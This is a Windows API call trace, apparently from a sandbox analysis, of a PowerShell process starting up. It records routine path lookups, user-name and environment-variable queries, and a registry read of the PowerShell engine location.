	[0222.208] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x1dcec0 | out: lpFileInformation=0x1dcec0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0222.208] SetErrorMode (uMode=0x1) returned 0x1
	[0222.208] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x1dccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0222.208] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\.", nBufferLength=0x105, lpBuffer=0x1dcbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0222.217] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x1dcf20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0222.218] SetErrorMode (uMode=0x1) returned 0x1
	[0222.218] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x1dd180 | out: lpFileInformation=0x1dd180*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0222.218] SetErrorMode (uMode=0x1) returned 0x1
	[0228.170] CoTaskMemAlloc (cb=0x804) returned 0x1b892e10
	[0228.170] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b892e10, nSize=0x1dd4e8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x1dd4e8) returned 0x1
	[0228.170] CoTaskMemFree (pv=0x1b892e10) 
	[0228.170] CoTaskMemAlloc (cb=0x204) returned 0x408e50
	[0228.170] GetUserNameW (in: lpBuffer=0x408e50, pcbBuffer=0x1dd528 | out: lpBuffer="aETAdzjz", pcbBuffer=0x1dd528) returned 1
	[0228.171] CoTaskMemFree (pv=0x408e50) 
	[0228.172] ReportEventW (hEventLog=0x2780008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2df7d50*="Available", lpRawData=0x2df7ae0) returned 1
	[0228.323] CoTaskMemAlloc (cb=0x104) returned 0x3c3ba0
	[0228.323] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0228.323] CoTaskMemFree (pv=0x3c3ba0) 
	[0228.324] CoTaskMemAlloc (cb=0x104) returned 0x3c3ba0
	[0228.324] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0228.324] CoTaskMemFree (pv=0x3c3ba0) 
	[0228.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dcff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dcf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dcf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dcf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dcec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dcec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.330] CoTaskMemAlloc (cb=0x104) returned 0x3c3ba0
	[0228.330] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x3c3ba0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0228.330] CoTaskMemFree (pv=0x3c3ba0) 
	[0228.330] CoTaskMemAlloc (cb=0x104) returned 0x3c3ba0
	[0228.330] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x3c3ba0, nSize=0x80 | out: lpBuffer="\\Users\\aETAdzjz") returned 0xf
	[0228.330] CoTaskMemFree (pv=0x3c3ba0) 
	[0228.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dcf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dcec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dcec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dcf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dcec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dcec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dcf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dcec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dcec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.332] GetCurrentProcessId () returned 0x31c
	[0228.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dcf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dcec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dcec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dcf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dcf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dcf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dcec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dcec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.336] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1dd508 | out: phkResult=0x1dd508*=0x398) returned 0x0
	[0228.336] RegQueryValueExW (in: hKey=0x398, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1dd48c, lpData=0x0, lpcbData=0x1dd488*=0x0 | out: lpType=0x1dd48c*=0x1, lpData=0x0, lpcbData=0x1dd488*=0x56) returned 0x0
	[0228.337] CoTaskMemAlloc (cb=0x5a) returned 0x1b872c80
	[0228.337] RegQueryValueExW (in: hKey=0x398, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1dd45c, lpData=0x1b872c80, lpcbData=0x1dd458*=0x56 | out: lpType=0x1dd45c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1dd458*=0x56) returned 0x0
	[0228.337] CoTaskMemFree (pv=0x1b872c80) 
	[0228.337] RegCloseKey (hKey=0x398) returned 0x0
	[0228.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dcf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dcec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dcec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dcf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.356] CoTaskMemAlloc (cb=0x104) returned 0x3c3ba0
	[0228.356] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0228.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.365] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.367] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.917] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.919] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.924] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.926] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.933] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
